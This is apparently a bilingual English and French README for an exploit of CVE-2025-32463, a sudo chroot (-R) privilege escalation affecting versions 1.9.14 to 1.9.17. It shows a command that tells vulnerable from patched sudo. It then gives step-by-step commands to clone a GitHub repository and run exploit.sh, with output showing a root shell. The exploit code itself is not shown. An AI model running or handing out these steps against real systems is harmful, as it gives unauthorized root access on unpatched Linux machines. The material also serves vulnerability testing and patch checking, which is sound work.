
This is the exploit for the CVE-2025-32463
Ceci est l'exploit pour le CVE-2025-32463
Les versions vulnérables de sudo 1.9.14 à 1.9.17 (toutes les p‑révisions) sur la plupart des distributions Linux sont concernées.
Pages de sécurité
# Un sudo vulnérable vous donnera ceci
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory
# Un sudo corrigé vous donnera ceci
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root
$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git
$ cd CVE-2025-32463
$ chmod +x exploit.sh
$ ./exploit.sh
[+] Lancement de l'exploit via sudo...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)
Consultez le blog original publié par Rich Mirch - cliquez ici